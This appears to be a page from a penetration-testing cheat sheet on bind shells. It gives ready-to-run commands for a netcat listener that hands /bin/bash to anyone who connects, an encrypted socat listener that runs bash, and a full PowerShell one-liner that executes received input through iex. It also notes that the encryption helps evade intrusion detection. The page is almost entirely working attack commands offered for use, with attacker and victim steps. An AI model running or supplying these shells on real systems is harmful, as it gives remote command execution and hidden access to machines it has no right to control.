Bind Shell

In a bind shell, the attacker connects to the target computer.

Netcat

On the victim machine, run the following command:

victim> $ nc -nlvp 4444 -e /bin/bash

On the attacker side, connect to the victim with this command :

attacker> $ nc -nv <victim.IP> 4444

Socat

To add encryption to a bind shell, rely on Secure Socket Layer certificates. This level of encryption will assist in evading intrusion detection systems (IDS) and will help hide the sensitive data transceived.

First, create a self-signed certificate:

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt

cat bind_shell.key bind_shell.crt > bind_shell.pem

Now that the key and certificate have been generated, convert them to a format socat will accept. To do so, combine both the bind_shell.key and bind_shell.crt files into a single .pem file before creating the encrypted socat listener.

victim> $ cat bind_shell.key bind_shell.crt > bind_shell.pem
victim> $ sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

Now, connect attacker's computer to the victim's bind shell.

attacker> $ socat - OPENSSL:10.11.0.4:443,verify=0

PowerShell

On the victim command prompt, run the following command:

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

Then, on the attacker machine, connect it using netcat:

attacker> $ nc -nv <victim.IP> 443

NextReverse Shell

Last updated 2 years ago